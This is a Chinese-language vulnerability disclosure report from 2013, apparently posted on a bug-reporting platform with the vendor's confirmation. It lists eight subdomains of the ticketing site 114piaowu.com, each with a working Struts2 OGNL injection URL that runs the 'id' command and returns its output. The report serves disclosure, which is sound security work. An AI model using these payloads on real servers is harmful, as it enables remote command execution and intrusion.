2013-07-31: 细节已通知厂商并且等待厂商处理中 2013-08-02: 厂商已经确认,细节仅向厂商公开 2013-08-12: 细节向核心白帽子及相关领域专家公开 2013-08-22: 细节向普通白帽子公开 2013-09-01: 细节向实习白帽子公开 2013-09-14: 细节向公众公开
rt……
测试中发现,主站及少数的几个站点貌似修复了。。。我这里把发现的都贴上来吧,,,毕竟这个工具泛滥的年代,,,,说不好对么,,,,请及时修补吧。。。。
http://gaotie.114piaowu.com/index.action?redirect:${%23a%3d(new java.lang.ProcessBuilder("id")).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}http://checi.114piaowu.com/index.action?redirect:${%23a%3d(new java.lang.ProcessBuilder("id")).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}http://daishoudian.114piaowu.com/index.action?redirect:${%23a%3d(new java.lang.ProcessBuilder("id")).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}http://huochepiao.114piaowu.com/index.action?redirect:${%23a%3d(new java.lang.ProcessBuilder("id")).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}http://huochezhan.114piaowu.com/index.action?redirect:${%23a%3d(new java.lang.ProcessBuilder("id")).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}http://piaojia.114piaowu.com/index.action?redirect:${%23a%3d(new java.lang.ProcessBuilder("id")).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}http://shike.114piaowu.com/index.action?redirect:${%23a%3d(new java.lang.ProcessBuilder("id")).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}http://yupiao.114piaowu.com/index.action?redirect:${%23a%3d(new java.lang.ProcessBuilder("id")).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
话说顺带求个礼物O(∩_∩)O~
危害等级:高
漏洞Rank:20
确认时间:2013-08-02 17:03
已经确认
暂无